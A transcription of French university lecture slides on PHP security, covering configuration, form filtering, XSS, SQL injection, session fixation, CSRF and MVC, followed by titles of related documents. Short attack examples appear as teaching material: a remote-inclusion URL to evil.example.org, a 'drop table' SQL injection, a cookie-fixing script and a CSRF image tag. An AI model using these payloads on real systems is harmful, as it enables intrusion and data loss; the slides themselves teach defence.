T. HSU Sécurité des programmes PHP

Dimension: px
Commencer à balayer dès la page:

Download "T. HSU Sécurité des programmes PHP"

Transcription

1 Sécurité des programmes PHP T. HSU IUT de LENS, Département informatique November 13, 2012

2 Part I Introduction à PHP

3 Fonctionnement 1 : Requète PHP 2 : Aller chercher la page MySQL Page PHP Moteur PHP 4 : Retourner la page HTML Page HTML

4 Le classique : Bonjour bonjour.php <html> <body> <h1> Mon P r e m i e r S c r i p t </h1> <$php echo HELLO WORLD ;?> </body> </html> bonjour.html <html> <body> <h1> Mon P r e m i e r S c r i p t </h1> HELLO WORLD </body> </html> Remarque Même en local, on doit passer par le serveur WEB Les lignes html sont générées avec la fonction echo

5 Un autre exemple unautreexemple.php <html> <body> <h1> Mon deuxieme S c r i p t </h1> <?php echo Nous sommes l e. gmdate ( D j M Y ). <br> ; echo Je r a j o u t e deux s a u t s a l a l i g n e <br><br> ; echo e t <u>un t e x t e s o u l i g n e </u> ;?> <h1>continuons </h1> Du html de base </body> </html>

6 Part II Fichier de configuration

7 php.ini Il existe un fichier pour configurer PHP (php.ini) Il existe des fichiers de configuration recommandée : php.ini-production, php.ini-development (php.ini-recommended) Quelques règles importantes error reporting : définit le niveau désiré de signalement des erreurs (mettre à E ALL) display errors : détermine si les erreurs doivent être affichées (mettre à On en développement, Off ensuite) log errors : détermine si les erreurs doivent être sauvegardées dans un fichier (mettre à On)

8 Part III Traitements des formulaires

9 Introduction Qui dit page web dynamique, dit possibilité au client de choisir la valeur de certaines variables Le langage html propose l utilisation de formulaires afin de collecter diverses informations Ces informations seront ensuite envoyées à d autres pages html ou PHP

10 Syntaxe les balises <form> et </form> servent à délimiter les formulaires Les paramètres pris par le tag <form> sont action : fixe le nom du document qui sera appelé lors de la soumission du formulaire method : détermine la méthode de passage des paramètres lors de la soumission des données GET POST

11 Les Méthodes de passage Méthode GET Les paramètres (et les valeurs) sont passés dans l URL du document de la façon suivante : document.php?param1=val1&param2=val2... Méthode POST Les paramères sont passés sous le même format mais ils sont passés dans le corps de la requête HTTP Ils sont invisibles sur la ligne de commande sur le log du serveur web

12 Quelle méthode choisir? Dépend de ce que l on veut faire... La méthode GET est inadaptée à la saisie de mots de passe La méthode GET est inadaptée lorsque l on veut modifier des données d une BD La méthode POST impose obligatoirement une reconnexion au serveur C est pourquoi, les moteurs de recherche choisissent la méthode GET Sur peu de jours, la base de donnée change peu d état, deux mêmes recherches aboutissent à peu près au même résultat

13 La directive Register globals Parmi les nombreuses options de php.ini, il y a REGISTER GLOBALS Depuis la PHP 4.2 cette directive est désactivée par défaut, Heureusement A quoi sert elle? Voyons voir un exemple

14 Exemple de Faille faille1.php <?php i f ( u t i l i s a t e u r A u t o r i s e ( ) ) { $ a u t o r i s a t i o n = true ; } i f ( $ a u t o r i s a t i o n ) { i n c l ude / donnees / s e n s i b l e s / data. php ; } > Que se passe t il si on appelle la page avec?autorisation=true

15 Un autre exemple faille2.php <?php i n c l ude $path / s c r i p t. php ;?> Que se passe t il si on appelle avec? path=http%3a%2f%2fevil.example.org%2f Nécessite la directive allow url fopen activée (activée dans php.ini-recommendended) Faille utilisée dans divers sites web

16 Attention Même sans REGISTER GLOBALS on est vulnérable à ce type d attaque Pensez à initialiser les variables locales!

17 Traitement des données des formulaires Considérez que toute donnée qui vous est fournie est mauvaise jusqu à ce que vous soyez sûr du contraire Idem pour les cookies, les variables de type server (REMOTE ADDR, HTTP REFERER...) formulaire.php <form a c t i o n= t r a i t e c o u l e u r. php method= POST > < s e l e c t name= c o u l e u r > <o p t i o n v a l u e= rouge >rouge </o p t i o n > <o p t i o n v a l u e= v e r t >v e r t </o p t i o n > <o p t i o n v a l u e= b l e u >bleu </o p t i o n > </ s e l e c t > <i n p u t t y p e= submit /> </form> Êtes vous sur de recevoir une des 3 valeurs rouges, vert ou bleu NON et en plus c est simple à mettre en oeuvre

18 Filtrage des données Chaque donnée extérieure (GET, POST,...) doit etre filtrée pour voir si elle est réellement valide Est ce qu il vaut mieux refuser une donnée valide que d accepter une donnée invalide? (certains sites refusent les noms comme O machin) La variable clean vous aide et vous rappelle que votre champ est valide...

19 Le Cross-site Scripting Cette attaque ne s adresse pas au serveur mais à l internaute via une faille de l application Comment ça? Que se passe t il si je mets des scripts javascripts!!! ils seront interprétés! Votre application est vulnérable si elle affiche des données externes sans les filtrer au préalable Comment se prémunir : utilisation des fonction htmlentities, strip tags ou autre utf8 decode L option magic quotes gpc de php.ini : disparaitra... dans la version PHP6!! Vous devez pensez à gérer vous même cela!!

20 Part IV Base de données

21 Introduction Approche pratique mais!!! PHP permet de dialoguer avec une base de donnée Les connexion, requête, insertions se font via des fonctions PHP (exemple...) Le script de base (nommé db.php.inc) db.php.inc <?php $host = t o t o. f r ; $username = myuser ; $password = mypass ; $db = m y s q l i c o n n e c t ( $host, $username, $password ) ;?>

22 Précautions Si vous le pouvez mettez votre fichier db.php.inc hors de la racine Web Sinon, demandez à apache (via.htaccess par exemple) de rendre inaccessible les fichiers.inc.htaccess < F i l e s \. i n c \$ > Order allow, deny Deny from a l l </ F i l e s >

23 Autre solution Créez un fichier /chemin/vers/toto que seul root peut lire SetEnv DB USER myuser SetEnv DB PASS mypass Incluez ce fichier dans httpd.conf : Include /chemin/vers/toto Vous avez maintenant accès à $ SERVER[ DB USER ] et $ SERVER[ DB PASS ]

24 Injections SQL Insertion de données comprenant du code SQL Exemples Intrusion dans un site Insertion d un utilisateur mysql, psql ou autre... Un exemple : Requête SQL SELECT * FROM Utilisateurs Where login= %s and passwd= %s peut se transformer en : SELECT * FROM Utilisateurs Where login= toto OR 1=1 and passwd= %s ou pire encore : SELECT * FROM Utilisateurs Where login= toto OR 1=1; drop table Utilisateurs; and passwd= %s

25 Précautions Tout d abord, évitez d utiliser un compte ayant tous les pouvoirs pour l exécution de votre serveur sql si possible. Filtrer les données Placez les données entre apostrophes (toutes les données!!) Utilisez des séquences d échappement pour vos données : fonctions mysqli real escape string() ou addslashes()

26 mysqli real escape string Exemple <?php // Connexion $ l i n k=m y s q l i c o n n e c t ( m y s q l h o s t, m y s q l u s e r, mysql passwd ) OR d i e ( m y s q l i e r r o r ( $ l i n k ) ) ; // Requete $ query = s p r i n t f ( SELECT FROM u s e r s WHERE u s e r = %s AND password= %s, m y s q l i r e a l e s c a p e s t r i n g ( $ l i n k, $ u s e r ), m y s q l i r e a l e s c a p e s t r i n g ( $ l i n k, $password ) ) ; m y s q l i q u e r y ( $ l i n k, $ query ) ;?>

27 Part V Les cookies et les sessions

28 Introduction Le protocole HTTP est sans état, c est-à-dire que le serveur ne conserve aucun lien entre deux sollicitations d une même source. Comment conserver des informations sur un visiteur entre deux clics? Jusqu à la version 3 Passage des variables dans l url Passage caché via la méthode POST et le tag HIDDEN Utilisation d une base de donnée Utilisation de cookies Depuis la version 4 : Les sessions

29 Introduction... 2 Moyen de sauvegarder et de modifier des variables tout le long de la visite d un internaute Sécurisation de sites, sauvegarde du panier Les informations relatives à une session sont conservées sur le serveur Un identifiant de session est posté sur le client via un cookie ou via l url

30 Les cookies : principe Ils sont créés par le serveur, grâce à l en-tête de réponse Set-cookie Lorsque le navigateur sollicite la page, cet en-tête est ajouté dans la réponse. La valeur unique d un cookie permet au serveur d identifier de manière distincte un navigateur par rapport aux autres.

31 Les cookies : fonctions cookie de préférence : enregistrement de la configuration d un utilisateur (ex. choix de la langue). cookie de session : Au démarrage d une session PHP, elle produit un identifiant de session unique (32 chiffres hexadécimaux). Cet identifiant permet : l identification d un navigateur la sauvegarde des variables de session

32 Les cookies : pourquoi les voler? Hypothèse : il est impossible que deux utilisateurs obtiennent par hasard deux fois le même identifiant de session. La sécurité des données est reportée entièrement sur le cookie de session : la présentation d un cookie suffit pour identifier un utilisateur. Le vol du cookie de session permet d usurper l identité d un utilisateur.

33 Les cookies : la défendre setcookie b o o l s e t c o o k i e ( s t r i n g name [, s t r i n g v a l u e [, i n t e x p i r e [, s t r i n g path [, s t r i n g domain [, b o o l s e c u r e [, b o o l HTTPOnly ] ] ] ] ] ] ) ; value : cryptée la valeur si nécessaire expire : durée de vie courte (attention au décalage horaire) path : chemin pour lequel le cookie est valable (utile dans le cas où le site est partagé) domain : domaine autorisé au cookie (évite de transférer le cookie à tous) secure : transmission sécurisée (true) HTTPOnly : Utilisable entre serveur et navigateur uniquement (php 5.2)

34 Les cookies : pour la sécurité (1) Un cookie peut être utilisé pour bannir un utilisateur indésirable. mise en place du cookie <?php S e t c o o k i e ( PHPSESSID, md5( microtime ( ) ), time , /,. m e s i t e s. com ) ;?> contrôle d accès <?php I f ( i s s e t ( $ COOKIE [ PHPSESSID ] ) ) { header ( HTTP/ Not Found ) ; d i e ( ) ; }?>

35 Les cookies : pour la sécurité (2) On veut s assurer qu un utilisateur est bien passé par un formulaire donné avant de lui afficher une autre page. formulaire.php <php S e t c o o k i e ( form, md5( p r e f i x e. $ SERVER [ REMOTE ADDR ] ), time , /, www. m o n s i t e. f r ) ;?> <form a c t i o n= a c t i o n. php method= POST > <i n p u t t y p e= submit v a l u e= s o u m i s s i o n > </form> action.php <?php i f (! i s s e t ( $ COOKIE [ form ] ) md5( p r e f i x e. $ SERVER [ REMOTE ADDR ] )! = $ COOKIE [ form ] ) ) { s e t c o o k i e ( form ) ; // e f f a c e m e n t du c o o k i e header ( L o c a t i o n : / f o r m u l a i r e. php ) ; // r e d i r e c t i o n d i e ( ) ; }?>

36 Création de la session Une session doit obligatoirement démarrer avant l envoi de toute information chez le client (affichage, ou envoi de header) Une session démarre avec session start() Un identifiant unique est alors généré <?php s e s s i o n s t a r t ( ) ; // Une n o u v e l l e s e s s i o n echo session name ( ). =. s e s s i o n i d ( ) ;?>

37 Enregistrement des variables Ensuite, on peut enregistrer des variables de session à l aide du tableau associatif $ SESSION. Elle remplace les fonctions : session register() session unregister() <?php $ l o g i n = UserName ;.... // e n r e g i s t r e m e n t de l a v a r i a b l e s e s s i o n l o g i n $ SESSION [ l o g i n ]= $ l o g i n ;.... // s u p p r e s s i o n de l a v a r i b l e s e s s i o n l o g i n unset $ SESSION [ l o g i n ] ; unset $ l o g i n ;?>

38 Récupération des variables Il faut utiliser le tableau associatif : $ SESSION <?php.... echo vous e t e s :. $ SESSION [ l o g i n ]. <br/> ;....?>

39 Charger une session en cours Le transport des informations peut être réalisé de deux/trois manières différentes Par utilisation de cookie ou de champs caché, on appelle cela le trans-id Par passage de l identifiant de session dans l url (méthode get) Seule l utilisation de cookie est sûre!!

40 Charger la session par utilisation de cookie Il n y a rien de particulier à faire En fait session start fonctionne ainsi : Si la session n existe pas : un identifiant est créé et est sauvegardé dans un cookie Si un cookie de session existe, alors la session est ouverte en utilisant comme identifiant celui stocké dans le cookie <?php s e s s i o n s t a r t ( ) ; echo Vous e t e s :. $ SESSION [ l o g i n ] ;....?>

41 Destruction session destroy() : destruction de la session.

42 Les problèmes de vol de session Le but du pirate est d obtenir un identifiant de session valide L objectif est de se faire passer pour quelqu un d autre... 3 méthodes : prédiction, capture et fixation Prédiction : très difficile, l identifiant est généré aléatoirement, ce n est pas là que se situe le point faible des applications Capture : facile si on fait passer l identifiant par la méthode GET (http referer, écoute sur réseau, copier/coller d adresses!), plus difficile avec les cookies Forcer l utilisation des cookies : cf php.ini Fixation : voyons voir

43 Fixation de sessions La fixation est le fait de déterminer un identifiant de session AVANT d utiliser l application (on le FIXE) Le pirate envoie l URL http: // à un GENTIL utilisateur Le GENTIL utilisateur suit le lien, s il ne possède pas de session vers toto.fr, il l initialise à 1234 Le GENTIL utilisateur s identifie Le pirate suit le lien http: // et se retrouve connecté comme étant le GENTIL utilisateur

44 Fixation de session : un exemple <?php s e s s i o n s t a r t ( ) ; i f ( i s s e t ($GET [ name ] ) ) $ SESSION [ name ] = $ GET [ name ] ; i f (! i s s e t ( $ SESSION [ v i s i t s ] ) ) $ SESSION [ v i s i t s ] = 1 ; e l s e $ SESSION [ v i s i t s ]++; echo $ SESSION [ name ]. : Nb a c c e s a c e t t e page ; echo d e p u i s l e debut de s e s s i o n :. $ SESSION [ v i s i t s ] ;?> On ne fait pas une nouvelle visite, on continue l ancienne Usurpation d identité!!

45 Fixation de session et cookie La fixation de session n est pas limitée à l utilisation du trans-id! Grâce à un XSS, le pirate peut initialiser un cookie avec javascript : document.cookie=#sessionid=1234#;

46 Précaution contre les fixations de sessions Vous êtes vulnérables si votre gestion de session ne consiste en rien de plus que session start() C est facilement réparable Vous pouvez prendre en compte le HTTP REFERER et le HTTP USER AGENT même si cela n est pas suffisant! <?php i f (! i s s e t ( $ SESSION [ i n i t i a l i s e ] ) ) { s e s s i o n r e g e n e r a t e i d (TRUE ) ; $ SESSION [ i n i t i a l i s e ] = t r u e ; }?> A chaque étape importante (changement de mot de passe...) regénérer le session id!

47 Protections contre les attaques Brutes Forces!! Une attaque brute force va tester des couples login/mots de passes à l aide de robots! Protection par nombres d attaques/jour Protection sur une base attaque/temps Protection par nombre attaque/compte

48 Attaques Cross-Site Request Forgeries (CSRF)!! Point de départ : une application plutôt bien sécurisée Un deuxième site est complètement distinct du premier, porteur d une vulnérabilité XSS Un pirate injecte l attaque suivante dans le deuxième site dans une image : <img s r c= h t t p : / /www. s i t e 1. com/ admin / e f f a c e. php? i d =22 /> L administrateur visite le site 2 et charge la page avec la vulnérabilité XSS!!!!!

49 Se défendre contre une (CSRF)!! Il faut compliquer la vie des pirates et s assurer souvent de l identite des utilisateurs Préférer POST à GET Lors de la réalisation d une opération critique Enchainer plusieurs pages (par exemple ajouter une page de confirmation) Identifier et authentifier systématique. Mise en place d un système d authentification aléatoire (nb de clics, durée,...)

50 Des listes pour se protéger Liste blanche : La validation d une donnée est basée sur une approche de type dictionnaire : la valeur doit faire partie d un ensemble de valeurs possibles. Liste noire : Le principe est de lister les valeurs interdites, pour pouvoir les refuser dès qu on les détecte. Liste grise : Valider avec une liste blanche et une liste noire

51 Part VI Le modèle MVC

52 Introduction Les applications php peuvent souvent devenir de vrais foutoirs Des pages accessibles de partout Des accès aux bases de données de partout C est rapidement non viable difficile à maintenir peu sûr

53 Introduction... Le modèle MVC (Modèle-Vue-Contrôleur) cherche à séparer nettement les couches présentation, traitement et accès aux données. Une application web respectant ce modèle sera architecturée de la façon suivante Interface utilisateur Logique applicative Source de données Une telle architecture est souvent appelée architecture 3-tiers ou à 3 niveaux l interface utilisateur est la vue (V) la logique applicative est le contrôleur (C) les sources de données sont le modèle (M) Le modèle MVC est bien adapté aux applications web

54 L architecture MVC Client Logique Applicative Données Interface Client main.php GENERATEUR DE VUES ACTIONS Classe d accès aux données Classe Metier Source des données le programme principal ou contrôleur, qui est la porte d entrée de l application le bloc [Actions], ensemble de scripts chargés d exécuter les actions demandées par l utilisateur le bloc [Classes métier] qui regroupe les modules php nécessaires à la logique de l application. Ils sont indépendants du client. le bloc [Classes d accès aux données] qui regroupe les modules php qui obtiennent les données nécessaires au contrôleur les générateurs des vues envoyées comme réponse au client.

55 Le modèle Le modèle peut être construit de divers manières Une classe par table dans la base de données est un bon exemple L utilisation d un ORM (Object relationnal mapping) est fortement conseillée : propel, phpmyobject... Abstraction des bases de données (PHP6???)

56 Le contrôleur Le contrôleur gère plusieurs actions (saisie d un nouvel utilisateur, affichage du résultat d une recherche) C est en quelque sorte le chef d équipe Il doit donc savoir quelle est l action désirée par le client Ceci se fait au moyen d un paramètre Soit par un champ hidden d un formulaire Soit par un champ passé dans l url en get On peut également utiliser l URL rewritting (utile pour le référencement) Il suffit ensuite de faire un switch/case sur la variable pour choisir l action à appliquer

57 La vue Possibilité d utiliser des moteurs de templates : smarty, modelixe... Dans le cas d applications de petite taille, le générateur de vue peut être remplacé directement inclus dans la partie applicative

58 frameworks MVC existants De nombreux frameworks MVC existent déjà. Difficile à appréhender? Gain de temps à court/moyen terme Symfony, Zend, Cake, Mojavi

59 Quelques remarques De cette façon le seul fichier qui doit être visible est le fichier index.php Les autres fichiers doivent être à l extérieur de l application ou inaccessible par un client web Comment faire : Dans le fichier de configuration de Apache (on n y a pas tout le temps accès) Avec.htaccess : fichiers de configuration d Apache, permettant de définir des règles dans un répertoire et dans tous ses sous-répertoires (qui n ont pas de tel fichier à l intérieur)

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin Sécurité des sites Web Pas un cours un recueil du net INF340 Jean-François Berdjugin Vulnérabilité Définition (wikipédia) : Dans le domaine de la sécurité informatique, une vulnérabilité est une faiblesse

Plus en détail

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement Guillaume HARRY l Contenu sous licence Creative Commons CC-BY-NC-ND Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement P. 2 1. Introduction 2.

Plus en détail

Vulnérabilités et sécurisation des applications Web

Vulnérabilités et sécurisation des applications Web OSSIR 09/09/2002 Vulnérabilités, attaques et sécurisation des applications Web Pourquoi les firewalls sont impuissants patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Page 1 Planning

Plus en détail

cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007

cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 A t t a q u e s c o n t r e l e s a p p l i s w e b cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 D e l ' u t i l i t é d e l ' a t t a

Plus en détail

Failles XSS : Principes, Catégories Démonstrations, Contre mesures

Failles XSS : Principes, Catégories Démonstrations, Contre mesures HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Séminaire 15 ans HSC Failles XSS : Principes, Catégories Démonstrations,

Plus en détail

PHP CLÉS EN MAIN. 76 scripts efficaces pour enrichir vos sites web. par William Steinmetz et Brian Ward

PHP CLÉS EN MAIN. 76 scripts efficaces pour enrichir vos sites web. par William Steinmetz et Brian Ward PHP CLÉS EN MAIN 76 scripts efficaces pour enrichir vos sites web par William Steinmetz et Brian Ward TABLE DES MATIÈRES INTRODUCTION 1 1 TOUT CE QUE VOUS AVEZ TOUJOURS VOULU SAVOIR SUR LES SCRIPTS PHP

Plus en détail

La programmation orientée objet Gestion de Connexions HTTP Manipulation de fichiers Transmission des données PHP/MySQL. Le langage PHP (2)

La programmation orientée objet Gestion de Connexions HTTP Manipulation de fichiers Transmission des données PHP/MySQL. Le langage PHP (2) Le langage PHP (2) Walid Belkhir Université de Provence belkhir@cmi.univ-mrs.fr http://www.lif.univ-mrs.fr/ belkhir/ 1 / 54 1 La programmation orientée objet 2 Gestion de Connexions HTTP 3 Manipulation

Plus en détail

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Pourquoi revoir la sécurité des applications Web Des technologies omniprésentes Facilité de mise en œuvre et de déploiement. Commerce en ligne,

Plus en détail

PHP. Bertrand Estellon. 26 avril 2012. Aix-Marseille Université. Bertrand Estellon (AMU) PHP 26 avril 2012 1 / 214

PHP. Bertrand Estellon. 26 avril 2012. Aix-Marseille Université. Bertrand Estellon (AMU) PHP 26 avril 2012 1 / 214 PHP Bertrand Estellon Aix-Marseille Université 26 avril 2012 Bertrand Estellon (AMU) PHP 26 avril 2012 1 / 214 SQLite et PDO Base de données SQLite et PDO SQLite écrit les données relatives à la base dans

Plus en détail

Vulnérabilités et solutions de sécurisation des applications Web

Vulnérabilités et solutions de sécurisation des applications Web Vulnérabilités et solutions de sécurisation des applications Web Patrick CHAMBET EdelWeb ON-X Consulting patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Eric Larcher RSSI Accor

Plus en détail

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI OWASP Open Web Application Security Project Jean-Marc Robert Génie logiciel et des TI A1: Injection Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est

Plus en détail

SYSTÈMES D INFORMATIONS

SYSTÈMES D INFORMATIONS SYSTÈMES D INFORMATIONS Développement Modx Les systèmes de gestion de contenu Les Content Management Système (CMS) servent à simplifier le développement de sites web ainsi que la mise à jour des contenus.

Plus en détail

Sécuriser les applications web

Sécuriser les applications web SÉCURITÉ RÉSEAUX TONY FACHAUX Degré de difficulté Sécuriser les applications web L'article présente d'une manière générale les moyens techniques à mettre en œuvre pour sécuriser les applications web d'une

Plus en détail

Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4)

Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4) Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4) Sommaire : Contenu I. Introduction:... 2 II. Présentation de l atelier :... 2 1) Attaque persistante :... 3 2) Attaque non persistante :...

Plus en détail

les techniques d'extraction, les formulaires et intégration dans un site WEB

les techniques d'extraction, les formulaires et intégration dans un site WEB les techniques d'extraction, les formulaires et intégration dans un site WEB Edyta Bellouni MSHS-T, UMS838 Plan L extraction des données pour un site en ligne Architecture et techniques Les différents

Plus en détail

Les sites Internet dynamiques. contact : Patrick VINCENT pvincent@erasme.org

Les sites Internet dynamiques. contact : Patrick VINCENT pvincent@erasme.org Les sites Internet dynamiques contact : Patrick VINCENT pvincent@erasme.org Qu est-ce qu un site Web? ensemble de pages multimédia (texte, images, son, vidéo, ) organisées autour d une page d accueil et

Plus en détail

La mémorisation des mots de passe dans les navigateurs web modernes

La mémorisation des mots de passe dans les navigateurs web modernes 1 La mémorisation des mots de passe dans les navigateurs web modernes Didier Chassignol Frédéric Giquel 6 décembre 2005 - Congrès JRES 2 La problématique Multiplication des applications web nécessitant

Plus en détail

Devenez un véritable développeur web en 3 mois!

Devenez un véritable développeur web en 3 mois! Devenez un véritable développeur web en 3 mois! L objectif de la 3W Academy est de former des petits groupes d élèves au développement de sites web dynamiques ainsi qu à la création d applications web

Plus en détail

Hébergement de site web Damien Nouvel

Hébergement de site web Damien Nouvel Hébergement de site web Plan L'hébergeur Le serveur web Apache Sites dynamiques 2 / 27 Plan L'hébergeur Le serveur web Apache Sites dynamiques 3 / 27 L'hébergeur L'hébergeur sous-traite l'architecture

Plus en détail

TP JAVASCRIPT OMI4 TP5 SRC1 2011-2012

TP JAVASCRIPT OMI4 TP5 SRC1 2011-2012 TP JAVASCRIPT OMI4 TP5 SRC1 2011-2012 FORMULAIRE DE CONTACT POUR PORTFOLIO PRINCIPE GENERAL Nous souhaitons réaliser un formulaire de contact comprenant les champs suivants : NOM PRENOM ADRESSE MAIL MESSAGE

Plus en détail

Présentation du relais HTTP Open Source Vulture. Arnaud Desmons <ads@intrinsec.com> Jérémie Jourdin <jjn@intrinsec.com>

Présentation du relais HTTP Open Source Vulture. Arnaud Desmons <ads@intrinsec.com> Jérémie Jourdin <jjn@intrinsec.com> Arnaud Desmons Jérémie Jourdin Présentation Motivations Historique Démonstration Présentation fonctionnelle Présentation technique L'interface d'administration Roadmap

Plus en détail

Module BD et sites WEB

Module BD et sites WEB Module BD et sites WEB Cours 8 Bases de données et Web Anne Doucet Anne.Doucet@lip6.fr 1 Le Web Architecture Architectures Web Client/serveur 3-tiers Serveurs d applications Web et BD Couplage HTML-BD

Plus en détail

Module Com231A - Web et Bases de Données Notion 5 : Formulaires et utilisation des Bases de Données avec PHP

Module Com231A - Web et Bases de Données Notion 5 : Formulaires et utilisation des Bases de Données avec PHP Module Com231A - Web et Bases de Données Notion 5 : Formulaires et utilisation des Bases de Données avec PHP Au cours de ce TP, vous allez voir comment PHP permet aux utilisateurs, une interaction avec

Plus en détail

Sécurité des applications web. Daniel Boteanu

Sécurité des applications web. Daniel Boteanu I F8420: Éléments de Sécurité des applications web Daniel Boteanu Architecture des applications web Client légitime Internet HTTP 浀 HTML Server Web 2 Architecture des applications web Client légitime Internet

Plus en détail

Magento. Magento. Réussir son site e-commerce. Réussir son site e-commerce BLANCHARD. Préface de Sébastien L e p e r s

Magento. Magento. Réussir son site e-commerce. Réussir son site e-commerce BLANCHARD. Préface de Sébastien L e p e r s Mickaël Mickaël BLANCHARD BLANCHARD Préface de Sébastien L e p e r s Magento Préface de Sébastien L e p e r s Magento Réussir son site e-commerce Réussir son site e-commerce Groupe Eyrolles, 2010, ISBN

Plus en détail

Mise en place d un serveur Proxy sous Ubuntu / Debian

Mise en place d un serveur Proxy sous Ubuntu / Debian BTS INFORMATIQUE DE GESTION Option Administrateur Réseaux Benoît VERRON Activité n 1 Mise en place d un serveur Proxy sous Ubuntu / Debian Présentation d un Proxy Un proxy (serveur mandataire) est un serveur

Plus en détail

Attaques de type. Brandon Petty

Attaques de type. Brandon Petty Attaques de type injection HTML Brandon Petty Article publié dans le numéro 1/2004 du magazine Hakin9 Tous droits reservés. La copie et la diffusion de l'article sont admises à condition de garder sa forme

Plus en détail

Un exemple d'authentification sécurisée utilisant les outils du Web : CAS. P-F. Bonnefoi

Un exemple d'authentification sécurisée utilisant les outils du Web : CAS. P-F. Bonnefoi Un exemple d'authentification sécurisée utilisant les outils du Web : CAS 111 L authentification CAS : «Central Authentication Service» CAS ou le service central d authentification Le système CAS, développé

Plus en détail

Préparation d un serveur Apache pour Zend Framework

Préparation d un serveur Apache pour Zend Framework Préparation d un serveur Apache pour Zend Framework Jacques THOORENS 30 novembre 2010 Résumé Cette petite introduction explique comment paramétrer son serveur Apache personnel pour en faire une machine

Plus en détail

Installation d un serveur HTTP (Hypertext Transfer Protocol) sous Débian 6

Installation d un serveur HTTP (Hypertext Transfer Protocol) sous Débian 6 Installation d un serveur HTTP (Hypertext Transfer Protocol) sous Débian 6 1 BERNIER François http://astronomie-astrophotographie.fr Table des matières Installation d un serveur HTTP (Hypertext Transfer

Plus en détail

Formation Webase 5. Formation Webase 5. Ses secrets, de l architecture MVC à l application Web. Adrien Grand <jpountz@via.ecp.fr> Centrale Réseaux

Formation Webase 5. Formation Webase 5. Ses secrets, de l architecture MVC à l application Web. Adrien Grand <jpountz@via.ecp.fr> Centrale Réseaux Formation Webase 5 Ses secrets, de l architecture MVC à l application Web Adrien Grand Centrale Réseaux Sommaire 1 Obtenir des informations sur Webase 5 2 Composants de Webase 5 Un

Plus en détail

GUIDE D INSTALLATION DE L APPLICATION GECOL SUR

GUIDE D INSTALLATION DE L APPLICATION GECOL SUR GUIDE D INSTALLATION DE L APPLICATION GECOL SUR SERVEUR WINDOWS INTRODUCTION Le guide d installation qui va suivre va tenter d amener de la simplicité et de centraliser toutes les informations nécessaires

Plus en détail

Attaques applicatives

Attaques applicatives Attaques applicatives Attaques applicatives Exploitation d une mauvaise programmation des applications Ne touche pas le serveur lui-même mais son utilisation/ configuration Surtout populaire pour les sites

Plus en détail

Sécuriser les applications web de l entreprise

Sécuriser les applications web de l entreprise LABORATOIRE SECURITE Sécuriser les applications web de l entreprise Mise en place de ModSecurity pour Apache Julien SIMON - 61131 Sommaire Présentation de la situation actuelle...3 Qu est ce qu un WAF?...5

Plus en détail

PHP et les Bases de données - Généralités

PHP et les Bases de données - Généralités PHP et les Bases de données - Généralités Conception d une base de données Méthodes utilisées : MERISE, UML Modèle conceptuel des données MCD, Modèle logique MLD, Modèle Physique MPD. Ces aspects seront

Plus en détail

www.netexplorer.fr contact@netexplorer.fr

www.netexplorer.fr contact@netexplorer.fr www.netexplorer.fr 05 61 61 20 10 contact@netexplorer.fr Sommaire Sécurité applicative... 3 Authentification... 3 Chiffrement... 4 Traçabilité... 4 Audits... 5 Sécurité infrastructure... 6 Datacenters...

Plus en détail

25 mars. Tutoriel sur Laravel. Préparé par : Lydiane Beaulne-Bélisle. Ceci est un tutorial qui montre comment débuter avec le Framework PHP Laravel.

25 mars. Tutoriel sur Laravel. Préparé par : Lydiane Beaulne-Bélisle. Ceci est un tutorial qui montre comment débuter avec le Framework PHP Laravel. 25 mars Tutoriel sur Laravel Préparé par : Lydiane Beaulne-Bélisle Ceci est un tutorial qui montre comment débuter avec le Framework PHP Laravel. Créé pour le cours de Projet de fin d étude Collège de

Plus en détail

Pratique et administration des systèmes

Pratique et administration des systèmes Université Louis Pasteur Licence Informatique (L2) UFR de Mathématiques et Informatique Année 2007/2008 1 But du TP Pratique et administration des systèmes TP10 : Technologie LAMP Le but de ce TP est de

Plus en détail

ADF 2009. Reverse Proxy. Thierry DOSTES tdostes@ifr88.cnrs-mrs.fr

ADF 2009. Reverse Proxy. Thierry DOSTES tdostes@ifr88.cnrs-mrs.fr ADF 2009 Reverse Proxy Thierry DOSTES tdostes@ifr88.cnrs-mrs.fr 1 Définition d un serveur mandataire Un proxy (ou serveur mandataire) : agit comme une passerelle et un filtre pour accéder à l Internet.

Plus en détail

INTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau)

INTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau) CS WEB Ch 1 Introduction I. INTRODUCTION... 1 A. INTERNET INTERCONNEXION DE RESEAUX... 1 B. LE «WEB» LA TOILE, INTERCONNEXION DE SITES WEB... 2 C. L URL : LOCALISER DES RESSOURCES SUR L INTERNET... 2 D.

Plus en détail

Création d un «Web Worm»

Création d un «Web Worm» Création d un «Web Worm» Exploitation automatisée des failles web Simon Marechal Thales Security Systems Consultant Risk Management 1 Création d un ver exploitant une faille web 1.1 Introduction Les applications

Plus en détail

